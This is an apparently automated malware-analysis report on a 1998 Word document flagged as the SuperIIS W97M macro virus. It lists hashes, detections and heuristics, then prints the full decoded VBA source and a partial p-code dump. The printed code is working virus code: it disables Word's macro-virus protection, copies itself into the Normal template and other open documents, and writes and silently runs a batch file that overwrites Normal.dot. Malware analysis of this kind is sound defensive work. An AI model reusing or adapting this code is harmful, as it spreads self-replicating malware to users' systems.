Office (OLE) malware analysis — malicious · 2a762b87edc2a592

MALICIOUS

Office (OLE)

64.5 KB Created: 1998-07-27 13:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a1d0d345ca003b7284c8bedd8c8b5238 SHA-1: 79c7a80e77bf0200d9a0fda0de3881c6b565c60b SHA-256: 2a762b87edc2a592023f0ac3235aca389ead3da5a34015c16619af6f056573f4

356 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of older malware. The VBA script attempts to locate the Windows directory, clean itself from the current document and the Normal template, and then save a new template file named 'lo.sys' to the system directory. This behavior suggests an attempt to establish persistence or modify the user's environment, likely as part of a larger malicious operation.

Heuristics 8

ClamAV: Doc.Trojan.IIS-19 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.IIS-19
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
a = Shell(windir & "\System\lo.bat", 0)
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
FullCodeN = "Sub AutoClose()" & Chr(13)
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	49830 bytes
SHA-256: `848b77e0f9bcedf85dfb1bb280239ba6bbf41e6c850a042ab14184877b536fb7`
Detection ClamAV: Doc.Trojan.IIS-11 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Sub AutoOpen() On Error GoTo eb 'MyName=SuperIISv1.0 Call Flitnic eb: End Sub Sub ViewVbCode() On Error GoTo NoDoc Close #1 Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop Close #1 If windir = "" Then Exit Sub 'Clean Activedocument: ms = ActiveDocument.VBProject.VBComponents.Count For t = 1 To ms ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then Acd = 1 Exit For End If Next t a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a ActiveDocument.Saved = True ActiveDocument.Saved = True NoDoc: 'Clean NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For t2 = 2 To ms ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then NormT = 1 Exit For End If Next t2 a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines l = "" On Error GoTo 0 On Error GoTo eb NormalTemplate.OpenAsDocument ActiveDocument.SaveAs FileName:=windir & "\System\lo.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False a = Dir(NormalTemplate.FullName) If a = "" Then GoTo notemp If NormAt = True Then NormalTemplate.Saved = True End If notemp: a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.deletelines 1, a NormAt = False NormAt = ActiveDocument.ReadOnly ActiveDocument.Close a = Dir(windir & "\System\lo.bat") If a <> "" Then Kill windir & "\System\lo.bat" Close Open windir & "\System\lo.bat" For Append As #1 Print #1, ":Begin" l = Len(NormalTemplate.FullName) l = l - 10 Print #1, "If not exist " & Left(NormalTemplate.FullName, l) & "~$Normal.dot goto start" Print #1, "Goto Begin" Print #1, ":Start" Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Close #1 If NormAt = True Then GoTo NoBat a = Shell(windir & "\System\lo.bat", 0) NoBat: For i = 1 To 2 al = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, al NormalTemplate.Saved = True Next i esub: eb: NormalTemplate.Saved = True Application.ShowVisualBasicEditor = True NoDocL: Options.SaveNormalPrompt = False NormalTemplate.Saved = True End Sub Sub ToolsMacro() On Error GoTo NoDoc 'Save ActiveDocument: ms = ActiveDocument.VBProject.VBComponents.Count For t = 1 To ms ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then Acd = 1 Exit For End If Next t If Acd = 1 Then FullCodeD = "Sub AutoOpen" & Chr(13) FullCodeN = "Sub AutoClose()" & Chr(13) a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines For ii = 2 To a l = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.Lines(ii, 1) FullCodeN = FullCodeN & l & Chr(13) FullCodeD = FullCodeD & l & Chr(13) Next ii End If 'Clean Activedocument: a = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a ActiveDocument.Saved = True ActiveDocument.Saved = True NoDoc: 'Save NormalTemplate: ms = NormalTemplate.VBProject.VBComponents.Count For t2 = 1 To ms ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then NormT = 1 Exit For End If Next t2 If NormT = 1 Then FullCodeD = "Sub AutoOpen()" & Chr(13) FullCodeN = "Sub AutoClose()" & Chr(13) a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines For iiii = 2 To a l = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.Lines(iiii, 1) FullCodeD = FullCodeD & l & Chr(13) FullCodeN = FullCodeN & l & Chr(13) Next iiii End If 'Clean NormalTemplate: l = "" On Error GoTo 0 On Error GoTo eb a = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, a NormalTemplate.Saved = True esub: Close #1 Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop Close #1 If windir = "" Then Exit Sub a = GetAttr(NormalTemplate.FullName) If a = 33 Then a = 1 If a = 1 Then GoTo eb eb: NormalTemplate.Saved = True Application.Dialogs(wdDialogToolsMacro).Show ReInf = True If Application.ShowVisualBasicEditor = True Then ReInf = False Reinfection: If ReInf = True Then 'Reinfection: Acd = 0 NormT = 0 If NormT <> 1 Then NormalTemplate.OpenAsDocument NormAt = ActiveDocument.ReadOnly ActiveDocument.Close Close #1 look: ms = NormalTemplate.VBProject.VBComponents.Count For inn = 2 To ms a = NormalTemplate.VBProject.VBComponents(inn).CodeModule.countoflines If a < 1 Then NormalTemplate.VBProject.VBComponents(inn).CodeModule.AddFromstring (FullCodeN) i = 20 Exit For End If Next inn If i <> 20 Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 NormalTemplate.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look End If a = Dir(NormalTemplate.FullName) If a = "" Then GoTo notemp If NormAt = True Then NormalTemplate.Saved = True End If End If i = 1 If NormAt <> True Then NormalTemplate.Save notemp: If Acd <> 1 Then Close look2: a = Application.Documents.Count If a < 1 Then GoTo NoDocL ms = ActiveDocument.VBProject.VBComponents.Count For inn2 = 2 To ms a = ActiveDocument.VBProject.VBComponents(inn2).CodeModule.countoflines If a < 1 Then ActiveDocument.VBProject.VBComponents(inn2).CodeModule.AddFromstring (FullCodeD) i = 20 Exit For End If Next inn2 If i <> 20 Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 ActiveDocument.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look2 End If If UCase(Left(ActiveDocument.FullName, 1)) <> "A" And Mid(ActiveDocument.FullName, 3, 1) = "\" Then If ActiveDocument.ReadOnly = True Then GoTo noactsave ActiveDocument.Save noactsave: Else ActiveDocument.Saved = True End If End If NoDocL: Else a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.deletelines 1, a NormalTemplate.OpenAsDocument NormAt = False NormAt = ActiveDocument.ReadOnly ActiveDocument.Close a = Dir(windir & "\System\lo.bat") If a <> "" Then Kill windir & "\System\lo.bat" Close Open windir & "\System\lo.bat" For Append As #1 Print #1, ":Begin" l = Len(NormalTemplate.FullName) l = l - 10 Print #1, "If not exist " & Left(NormalTemplate.FullName, l) & "~$Normal.dot goto start" Print #1, "Goto Begin" Print #1, ":Start" Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Print #1, windir & "\command\Attrib.exe -s -h -r " & NormalTemplate.FullName Print #1, "Copy/y " & windir & "\System\lo.sys " & NormalTemplate.FullName Close #1 If NormAt = True Then GoTo NoBat a = Shell(windir & "\System\lo.bat", 0) NoBat: For i = 1 To 2 al = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, al NormalTemplate.Saved = True Next i End If Options.SaveNormalPrompt = False NormalTemplate.Saved = True End Sub Sub Flitnic() Begin: On Error GoTo eb NormAt = False Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Close #1 Open "c:\msdos.sys" For Input As #1 Do Until EOF(1) Line Input #1, a If Left(UCase(a), 7) = "WINDIR=" Then l = Len(a) windir = Mid(a, 8, l) End If Loop If windir = "" Then Exit Sub On Error GoTo NoInf ms = ActiveDocument.VBProject.VBComponents.Count For t = 1 To ms ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then Acd = 1 Exit For End If Next t If Acd = 1 Then FullCodeN = "Sub AutoClose()" & Chr(13) a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines For ii = 2 To a l = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.Lines(ii, 1) FullCodeN = FullCodeN & l & Chr(13) Next ii End If ms = NormalTemplate.VBProject.VBComponents.Count For t2 = 1 To ms ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1) If UCase(l) = "'MYNAME=SUPERIISV1.0" Then NormT = 1 Exit For End If Next t2 If NormT = 1 Then FullCodeD = "Sub AutoOpen()" & Chr(13) a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines For iiii = 2 To a l = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.Lines(iiii, 1) FullCodeD = FullCodeD & l & Chr(13) Next iiii End If If NormT <> 1 Then a = Dir(windir & "\System\lo.sys") If a <> "" Then Kill windir & "\System\lo.sys" NormalTemplate.OpenAsDocument NormAt = ActiveDocument.ReadOnly ActiveDocument.Close Close #1 look: ms = NormalTemplate.VBProject.VBComponents.Count For inn = 2 To ms a = NormalTemplate.VBProject.VBComponents(inn).CodeModule.countoflines If a < 1 Then NormalTemplate.VBProject.VBComponents(inn).CodeModule.AddFromstring (FullCodeN) i = 20 Exit For End If Next inn If i <> 20 Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 NormalTemplate.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look End If a = Dir(NormalTemplate.FullName) If a = "" Then GoTo notemp If NormAt = True Then NormalTemplate.Saved = True End If notemp: End If i = 1 If Acd <> 1 Then Close look2: ms = ActiveDocument.VBProject.VBComponents.Count For inn2 = 2 To ms a = ActiveDocument.VBProject.VBComponents(inn2).CodeModule.countoflines If a < 1 Then ActiveDocument.VBProject.VBComponents(inn2).CodeModule.AddFromstring (FullCodeD) i = 20 Exit For End If Next inn2 If i <> 20 Then Close #1 a = Dir(windir & "\System\Flitnic.drv") If a <> "" Then Kill windir & "\system\Flitnic.drv" Close #1 Open windir & "\System\Flitnic.drv" For Append As #1 Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34) Close #1 ActiveDocument.VBProject.VBComponents.Import windir & "\System\Flitnic.drv" GoTo look2 End If If UCase(Left(ActiveDocument.FullName, 1)) <> "A" And Mid(ActiveDocument.FullName, 3, 1) = "\" Then If ActiveDocument.ReadOnly = True Then GoTo noactsave ActiveDocument.Save noactsave: Else ActiveDocument.Saved = True End If End If NoInf: eb: d = Dir(NormalTemplate.FullName) If d = "" Then Exit Sub If NormAt = True Then SetAttr (NormalTemplate.FullName), vbNormal Else NormalTemplate.Save End If 'First ever used this kind of Stealth 'Written by Flitnic. I haven't yet included a payload! End Sub ' Processing file: /tmp/qstore_f2023fno ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Modul1 - 23967 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' Line #1: ' OnError eb ' Line #2: ' QuoteRem 0x0000 0x0013 "MyName=SuperIISv1.0" ' Line #3: ' ArgsCall (Call) Flitnic 0x0000 ' Line #4: ' Label eb ' Line #5: ' EndSub ' Line #6: ' FuncDefn (Sub ViewVbCode()) ' Line #7: ' OnError NoDoc ' Line #8: ' LitDI2 0x0001 ' Sharp ' Close 0x0001 ' Line #9: ' LitStr 0x000C "c:\msdos.sys" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Input) ' Line #10: ' LitDI2 0x0001 ' ArgsLd EOF 0x0001 ' DoUnitil ' Line #11: ' LitDI2 0x0001 ' Ld a ' LineInput ' Line #12: ' Ld a ' ArgsLd UCase 0x0001 ' LitDI2 0x0007 ' ArgsLd LBound 0x0002 ' LitStr 0x0007 "WINDIR=" ' Eq ' IfBlock ' Line #13: ' Ld a ' FnLen ' St l ' Line #14: ' Ld a ' LitDI2 0x0008 ' Ld l ' ArgsLd Mid$ 0x0003 ' St windir ' Line #15: ' EndIfBlock ' Line #16: ' Loop ' Line #17: ' LitDI2 0x0001 ' Sharp ' Close 0x0001 ' Line #18: ' Ld windir ' LitStr 0x0000 "" ' Eq ' If ' BoSImplicit ' ExitSub ' EndIf ' Line #19: ' QuoteRem 0x0000 0x0015 "Clean Activedocument:" ' Line #20: ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St ms ' Line #21: ' StartForVariable ' Ld t ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #22: ' Ld t ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' MemLd countoflines ' St ls ' Line #23: ' Ld ls ' LitDI2 0x0003 ' Gt ' If ' BoSImplicit ' LitDI2 0x0003 ' LitDI2 0x0001 ' Ld t ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St l ' EndIf ' Line #24: ' Ld l ' ArgsLd UCase 0x0001 ' LitStr 0x0014 "'MYNAME=SUPERIISV1.0" ' Eq ' IfBlock ' Line #25: ' LitDI2 0x0001 ' St Acd ' Line #26: ' ExitFor ' Line #27: ' EndIfBlock ' Line #28: ' StartForVariable ' Ld t ' EndForVariable ' NextVar ' Line #29: ' Ld t ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countoflines ' St a ' Line #30: ' LitDI2 0x0001 ' Ld a ' Ld t ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall deletelines 0x0002 ' Line #31: ' LitVarSpecial (True) ' Ld ActiveDocument ' MemSt Saved ' Line #32: ' LitVarSpecial (True) ' Ld ActiveDocument ' MemSt Saved ' Line #33: ' Label NoDoc ' Line #34: ' QuoteRem 0x0000 0x0015 "Clean NormalTemplate:" ' Line #35: ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St ms ' Line #36: ' StartForVariable ' Ld t2 ' EndForVariable ' LitDI2 0x0002 ' Ld ms ' For ' Line #37: ' Ld t2 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' MemLd countoflines ' St ls ' Line #38: ' Ld ls ' LitDI2 0x0003 ' Gt ' If ' BoSImplicit ' LitDI2 0x0003 ' LitDI2 0x0001 ' Ld t2 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St l ' EndIf ' Line #39: ' Ld l ' ArgsLd UCase 0x0001 ' LitStr 0x0014 "'MYNAME=SUPERIISV1.0" ' Eq ' IfBlock ' Line #40: ' LitDI2 0x0001 ' St NormT ' Line #41: ' ExitFor ' Line #42: ' EndIfBlock ' Line #43: ' StartForVariable ' Ld t2 ' EndForVariable ' NextVar ' Line #44: ' Ld t2 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countoflines ' St a ' Line #45: ' LitStr 0x0000 "" ' St l ' Line #46: ' OnError (GoTo 0) ' Line #47: ' OnError eb ' Line #48: ' Ld NormalTemplate ' ArgsMemCall OpenAsDocument 0x0000 ' Line #49: ' Ld windir ' LitStr 0x000E "\System\lo.sys" ' Concat ' ParamNamed FileName ' Ld wdFormatTemplate ' ParamNamed FileFormat ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #50: ' Ld NormalTemplate ' MemLd FullName ' ArgsLd Dir 0x0001 ' St a ' Line #51: ' Ld a ' LitStr 0x0000 "" ' Eq ' If ' BoSImplicit ' GoTo notemp ' EndIf ' Line #52: ' Ld NormAt ' LitVarSpecial (True) ' Eq ' IfBlock ' Line #53: ' LitVarSpecial (True) ' Ld NormalTemplate ' MemSt Saved ' Line #54: ' EndIfBlock ' Line #55: ' Label notemp ' Line #56: ' Ld t2 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd countoflines ' St a ' Line #57: ' LitDI2 0x0001 ' Ld a ' Ld t2 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall deletelines 0x0002 ' Line #58: ' LitVarSpecial (False) ' St NormAt ' Line #59: ' Ld ActiveDocument ' MemLd ReadOnly ' St NormAt ' Line #60: ' Ld ActiveDocument ' ArgsMemCall Close 0x0000 ' Line #61: ' Ld windir ' LitStr 0x000E "\System\lo.bat" ' Concat ' ArgsLd Dir 0x0001 ' St a ' Line #62: ' Ld a ' LitStr 0x0000 "" ' Ne ' If ' BoSImplicit ' Ld windir ' LitStr 0x000E "\System\lo.bat" ' Concat ' ArgsCall Kill 0x0001 ' EndIf ' Line #63: ' CloseAll ' Line #64: ' Ld windir ' LitStr 0x000E "\System\lo.bat" ' Concat ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Append) ' Line #65: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x0006 ":Begin" ' PrintItemNL ' Line #66: ' Ld NormalTemplate ' MemLd FullName ' FnLen ' St l ' Line #67: ' Ld l ' LitDI2 0x000A ' Sub ' St l ' Line #68: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x000D "If not exist " ' Ld NormalTemplate ' MemLd FullName ' Ld l ' ArgsLd LBound 0x0002 ' Concat ' LitStr 0x0017 "~$Normal.dot goto start" ' Concat ' PrintItemNL ' Line #69: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x000A "Goto Begin" ' PrintItemNL ' Line #70: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x0006 ":Start" ' PrintItemNL ' Line #71: ' LitDI2 0x0001 ' Sharp ' PrintChan ' Ld windir ' LitStr 0x001D "\command\Attrib.exe -s -h -r " ' Concat ' Ld NormalTemplate ' MemLd FullName ' Concat ' PrintItemNL ' Line #72: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x0007 "Copy/y " ' Ld windir ' Concat ' LitStr 0x000F "\System\lo.sys " ' Concat ' Ld NormalTemplate ' MemLd FullName ' Concat ' PrintItemNL ' Line #73: ' LitDI2 0x0001 ' Sharp ' PrintChan ' Ld windir ' LitStr 0x001D "\command\Attrib.exe -s -h -r " ' Concat ' Ld NormalTemplate ' MemLd FullName ' Concat ' PrintItemNL ' Line #74: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x0007 "Copy/y " ' Ld windir ' Concat ' LitStr 0x000F "\System\lo.sys " ' Concat ' Ld NormalTemplate ' MemLd FullName ' Concat ' PrintItemNL ' Line #75: ' LitDI2 0x0001 ' Sharp ' PrintChan ' Ld windir ' LitStr 0x001D "\command\Attrib.exe -s -h -r " ' Concat ' Ld NormalTemplate ' MemLd FullName ' Concat ' PrintItemNL ' Line #76: ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitStr 0x0007 "Copy/y " ' Ld windir ' Concat ' LitStr 0x000F "\System\lo.sys " ' Concat ' Ld NormalTemplate ' MemLd FullName ' Concat ' PrintItemNL ' Line #77: ' LitDI2 0x0001 ' Sharp ' Close 0x0001 ' Line #78: ' Ld NormAt ' LitVarSpecial (True) ' Eq ' If ' BoSImplicit ' GoTo NoBat ' EndIf ' Line #79: ' Ld windir ' LitStr 0x000E "\System\lo.bat" ' Concat ' LitDI2 0x0000 ' ArgsLd Shell 0x0002 ' St a ' Line #80: ' Label NoBat ' Line #81: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x0002 ' For ' Line #82: ' Ld t2 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' MemLd countoflines ' St al ' Line #83: ' LitDI2 0x0001 ' Ld al ' Ld t2 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall deletelines 0x0002 ' Line #84: ' LitVarSpecial (True) ' Ld NormalTemplate ' MemSt Saved ' Line #85: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #86: ' Label esub ' Line #87: ' Label eb ' Line #88: ' LitVarSpecial (True) ' Ld NormalTemplate ' MemSt Saved ' Line #89: ' LitVarSpecial (True) ' Ld Application ' MemSt ShowVisualBasicEditor ' Line #90: ' Label NoDocL ' Line #91: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #92: ' LitVarSpecial (True) ' Ld NormalTemplate ' MemSt Saved ' Line #93: ' EndSub ' Line #94: ' FuncDefn (Sub ToolsMacro()) ' Line #95: ' OnError NoDoc ' Line #96: ' QuoteRem 0x0000 0x0014 "Save ActiveDocument:" ' Line #97: ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St ms ' Line #98: ' StartForVariable ' Ld t ' EndForVariable ' LitDI2 0x0001 ' Ld ms ' For ' Line #99: ' Ld t ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' MemLd countoflines ' St ls ' Line #100: ' Ld ls ' LitDI2 0x0003 ' Gt ' If ' BoSImplicit ' LitDI2 0x0003 ' LitDI2 0x0001 ' Ld t ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St l ' EndIf ' Line #101: ' Ld l ' ArgsLd UCase 0x0001 ' LitStr 0x0014 "'MYNAME=SUPERIISV1.0" ' Eq ' IfBlock ' Line #102: ' LitDI2 0x0001 ' St Acd ' Line #103: …

Open this report in the interactive analyzer, or submit your own file for analysis.